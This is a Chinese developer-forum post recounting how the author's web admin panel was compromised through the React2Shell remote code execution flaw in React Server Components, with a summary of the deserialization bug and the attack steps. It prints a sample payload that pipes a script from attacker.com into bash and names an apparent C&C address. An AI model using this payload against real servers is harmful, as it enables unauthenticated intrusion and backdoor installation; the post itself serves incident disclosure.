Yoo趣儿

Yoo趣儿 Geek 程序员 中招了 React2Shell 一个影响 React 的严重未经身份验证 ...

中招了 React2Shell 一个影响 React 的严重未经身份验证的远程代码执行漏洞

查看 10|回复 0
作者:dodoa   
React2Shell (CVE-2025-55182)

  • 原文链接:
    https://www.rapid7.com/blog/post/etr-react2shell-cve-2025-55182-critical-unauthenticated-rce-affecting-react-server-components/

  • 攻击者的恶意脚本:
    https://gist.github.com/ripplek/c82170ea2627e7b8350ac0d434b03ed0

    前段时间用 CC 写了一个应用的 Web 管理后台并部署在阿里云,结果周末就遭遇了攻击。
    漏洞原理
    React Server Components 的反序列化漏洞:
  • RSC 使用自定义序列化格式在服务器与客户端之间传输数据  
  • 服务器会反序列化客户端发送的 RSC payload  
  • 漏洞允许攻击者注入特制序列化数据  
  • 服务器在反序列化过程中可能执行任意代码

    攻击步骤(概述)
    1. 发现目标
  • 扫描使用 Next.js 或其他 RSC 框架的服务器  
  • 识别处理 RSC 请求的端点  

    2. 构造恶意 payload
  • 创建特制的 RSC 序列化数据  
  • 注入可执行任意代码的片段,例如:

    // 恶意 RSC payload 中可能包含的示例
    eval('require("child_process").exec("curl http://attacker.com/python.sh | bash")')
    3. 发送攻击请求
  • 向 RSC 端点发送 POST 请求  
  • 携带恶意序列化 payload  
  • 无需身份验证

    4. 服务器执行
  • 服务器反序列化 payload  
  • 触发代码执行  
  • 下载并运行 python.sh

    5. 后门建立
  • python.sh 下载后门程序  
  • 后门连接至攻击者 C&C 服务器(如:119.45.243.154:8443)  
  • 攻击者获取持续访问权限
    • 返回列表
    您需要登录后才可以回帖 登录 | 立即注册

    AD1

    热门主题

    热门板块

    问与答分享发现分享创造奇思妙想分享邀请码商业推广优惠信息PythonPHPJavaJavaScriptNode.jsGo语言C++HTML

    公告

    标签|小黑屋|Yoo趣儿

    GMT+8, 2025-12-19 05:29 , Processed in 0.006679 second(s), 4 queries , Gzip On, MemCached On.

    Powered by Discuz! X3.2

    The happiest thing in the world is to strive for an ideal.

    返回顶部